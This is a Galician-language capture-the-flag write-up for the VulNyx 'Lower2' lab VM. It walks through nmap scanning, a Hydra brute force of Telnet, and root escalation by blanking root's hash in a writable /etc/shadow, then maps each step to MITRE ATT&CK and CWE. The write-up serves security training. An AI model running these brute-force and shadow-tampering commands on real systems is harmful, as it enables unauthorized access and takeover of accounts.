Ir ao contido

Lower2

Máquina virtual Lower2

Fig. VulNyx Lower2
Fig. Card VulNyx Lower2

A máquina Lower2 é moi interesante porque...

  • Banner SSH que revela o nome de usuario
  • Servizo Telnet en lugar de SSH
  • Usuario pertence ao grupo shadow pode ler /etc/shadow
  • Eliminación do hash de contrasinal de root en /etc/shadow
  • Acceso sen contrasinal mediante manipulación de /etc/shadow

Diagrama de ataque

Fig. Diagrama de ataque

Fase 1 — Recopilación

sudo arp-scan --interface=eth1 192.168.56.0/24
ping -c2 IP_VulNyx_Lower2 -R # TTL ≃ 64 ⇒ GNU/Linux, TTL ≃ 128 ⇒ Microsoft Windows
sudo nmap -sS -Pn -T4 -p- -vvv --min-rate 5000 IP_VulNyx_Lower2 # 22,23,80
whatweb IP_VulNyx_Lower2
curl -I IP_VulNyx_Lower2

Fase 2 — Análise

# Porto 23 → Telnet
# Intento de conexión SSH
ssh IP_VulNyx_Lower2
# No banner SSH aparece o usuario: [usuario]

# Usuario identificado: [usuario]

Fase 3 — Explotación

# Ataque de forza bruta Telnet ao usuario [usuario]
hydra -l [usuario] -P /usr/share/wordlists/rockyou.txt IP_VulNyx_Lower2 telnet
# Nota: Executar dúas veces se a primeira contrasinal non funciona

# Contrasinal atopada na segunda execución

# Acceso por Telnet
telnet [usuario]@IP_VulNyx_Lower2
# ⇒ Conseguimos consola de usuario [usuario] (flag user.txt)

Fase 4 — Post‑explotación

# Verificación de membresía de grupos
id
# Detectamos que [usuario] pertence ao grupo shadow

# Copia de /etc/shadow ao directorio home
cp -pv /etc/shadow .

# Modificación de /etc/shadow para eliminar contrasinal de root
nano shadow
# Modificamos a liña de root:
# root::restodoscampos...
# (Eliminamos o hash do contrasinal, deixando só os dous puntos)

# Reemplazo do ficheiro /etc/shadow
cp shadow /etc/shadow

# Cambio a usuario root sen contrasinal
su -
# Non solicita contrasinal
# ⇒ Conseguimos consola de root

# Verificación
whoami # root
cd /root
cat root.txt # ⇒ Flag de root conseguida

Correspondencia de fases → MITRE ATT&CK — VulNyx: Lower2

Fase Acción / Resumo Vector principal MITRE ATT&CK (IDs) CWE(s) (relevantes)
1. Recopilación Descubrimento de host e servizos expostos Scanning / descubrimento de servizos T1595 — Active Scanning
T1046 — Network Service Discovery
CWE-200 — Information Exposure (reconnaissance)
2. Análise Identificación de usuario mediante banner SSH User enumeration T1087 — Account Discovery
T1592 — Gather Victim Host Information
CWE-200 — Information Exposure
3. Explotación Ataque de forza bruta Telnet Brute-force de credenciais T1110.001 — Brute Force: Password Guessing
T1021 — Remote Services
CWE-521 — Weak Password Requirements; CWE-307 — Improper Restriction of Excessive Authentication Attempts
4. Post-explotación Descubrimento de membresía no grupo shadow Privilege discovery T1069.001 — Permission Groups Discovery: Local Groups
T1083 — File and Directory Discovery
CWE-732 — Incorrect Permission Assignment for Critical Resource
Lectura e modificación de /etc/shadow Password file manipulation T1003.008 — OS Credential Dumping: /etc/passwd and /etc/shadow
T1098 — Account Manipulation
CWE-732 — Incorrect Permission Assignment; CWE-522 — Insufficiently Protected Credentials
Eliminación de contrasinal de root en /etc/shadow Privilege escalation via password removal T1098 — Account Manipulation
T1548 — Abuse Elevation Control Mechanism
CWE-269 — Improper Privilege Management; CWE-284 — Improper Access Control